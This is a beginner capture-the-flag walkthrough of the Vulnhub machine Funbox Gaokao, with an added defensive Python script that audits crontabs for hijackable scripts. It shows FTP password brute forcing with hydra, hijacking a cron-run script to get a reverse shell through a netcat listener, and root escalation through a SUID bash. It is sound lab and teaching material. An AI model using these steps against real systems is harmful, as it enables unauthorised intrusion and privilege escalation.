Funbox Gaokao Walkthrough – Vulnhub – Writeup
Funbox Gaokao is a machine that the author has intended for beginners. This machine needs a bit of brute force and some knowledge of the FTP protocol.
Link to the machine: https://www.vulnhub.com/entry/funbox-gaokao,707/
Twitter handle of the author: https://twitter.com/@0815R2d2
Identify the target
The first step while working with the vulnhub challenges is to discover the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
Scan open ports
Then, I scanned the open ports to identify the exposed services on the target.
sudo nmap -v -T4 -A -p- -oN nmap.log 10.0.2.32
We have anonymous access to the FTP server, plus an SSH server, a web server and a MySQL server.
Enumerate FTP server
Since we have anonymous access to the FTP server, I started there. The default ftp client isn't that good, so I switch to lftp later on.
ftp 10.0.2.32
The server banner reveals a potential user of the machine. It also gives us the hostname, which has no significance for the purposes of this walkthrough. Hence, I started brute-forcing the password of that user.
hydra -V -l sky -P /home/kali/rockyou.txt 10.0.2.32 ftp
As you can see, we got the password for the user sky, so I logged in.
ftp 10.0.2.32
ls -al
pwd
You can see that it is the /home/sky directory of the target machine. Hence, I went one directory up to list the other users and found two more: lucy and sarah. Then I tried brute-forcing the password of sarah, which succeeded but turned out to be a rabbit hole. There is another rabbit hole: the password of sky also logs in to the MySQL server.
Moving forward, there is a file called user.flag with the following content. Here I am using the lftp client, because it makes life easier.
lftp -u sky,_pass_ 10.0.2.32
ls -al
cat user.flag
I got a hint from the user @D4rw1n on the Vulnhub Discord channel.
We can see that the flag file contains a shell script and that the file is executable for the user sarah. Hence, we might guess that there is a cron job run by sarah that executes it. Thus, I downloaded the file to my local machine, updated the script and uploaded it back to the FTP server.
get user.flag
# update the script
put user.flag
ls -al
You can see that the permissions are intact. However, if you somehow messed up the permissions, the FTP server has SITE commands enabled.
Using these SITE commands, we can run such commands on the server and fix the permissions.
Meanwhile, I also listened on port 4444.
nc -nlvp 4444
After a while, I got the reverse shell.
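The weakness used here is a cron job running as one user (sarah) that executes a file another user (sky, via FTP) can edit. The following audit script is an added example, not part of the original walkthrough; it parses entries in /etc/crontab format and flags scripts that are group/world writable or owned by someone other than the cron user or root. The sample crontab and the dict-based lookup used in testing are constructed.

```python
"""Audit system-crontab entries for scripts a lower-privileged user can modify."""
import os
import pwd
import stat

# Constructed sample in /etc/crontab format: minute hour dom month dow user command.
SAMPLE_CRONTAB = """
# m h dom mon dow user  command
*/1 * * * * sarah /home/sky/user.flag
0 3 * * * root  /usr/local/bin/backup.sh --full
@reboot sky /home/sky/start.sh
"""

def real_stat_info(path):
    """Return (owner_name, mode) for path, or None if it does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return pwd.getpwuid(st.st_uid).pw_name, st.st_mode

def parse_crontab(text):
    """Yield (user, script_path) for each active entry of a system crontab."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or environment assignment (PATH=..., MAILTO=...)
        fields = line.split()
        # '@reboot user cmd' has one schedule field; numeric schedules have five.
        n = 1 if fields[0].startswith("@") else 5
        if len(fields) <= n + 1:
            continue
        yield fields[n], fields[n + 1]

def audit_crontab(text, stat_info=real_stat_info):
    """Return [(user, path, reason)] for entries whose script another user could hijack."""
    findings = []
    for user, path in parse_crontab(text):
        info = stat_info(path)
        if info is None:
            continue  # command is not a file we can inspect (builtin, relative path, missing)
        owner, mode = info
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((user, path, "group/world writable"))
        elif owner not in (user, "root"):
            findings.append((user, path, "owned by %s" % owner))
    return findings

if __name__ == "__main__":
    with open("/etc/crontab") as fh:
        for finding in audit_crontab(fh.read()):
            print("%s runs %s: %s" % finding)
```

On the box, the entry for sarah would be reported as "owned by sky", which is exactly the ownership mismatch that lets sky control what sarah's cron job executes.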
Then, I proceeded with upgrading the shell. Check the following post on how to do that.
Upgrade to an intelligent reverse shell
However, since the python way didn’t work to get me a PTY shell, I used the following method.
SHELL=/bin/bash script -q /dev/null
Next, when I searched for SUID binaries, I found that bash has the setuid bit set.
find / -perm -4000 -exec ls -al {} \; 2>/dev/null
This means we can escalate privileges: bash -p keeps the effective UID of root instead of dropping it.
Reference: https://gtfobins.github.io/gtfobins/bash/
bash -p
whoami
cd /root
ls -al
cat root.flag